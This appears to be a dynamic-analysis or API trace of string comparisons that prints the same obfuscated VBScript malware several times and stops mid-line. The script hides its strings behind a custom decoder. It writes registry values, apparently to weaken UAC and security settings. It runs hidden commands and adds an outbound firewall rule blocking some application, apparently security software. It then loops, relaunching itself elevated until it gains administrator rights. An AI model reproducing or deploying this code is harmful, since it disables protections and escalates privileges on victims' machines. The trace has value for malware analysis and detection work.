bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.306] wcsncmp (_String1="(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.306] wcsncmp (_String1="Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 64 [0226.306] wcsncmp (_String1="id(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.306] wcsncmp (_String1="d(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run 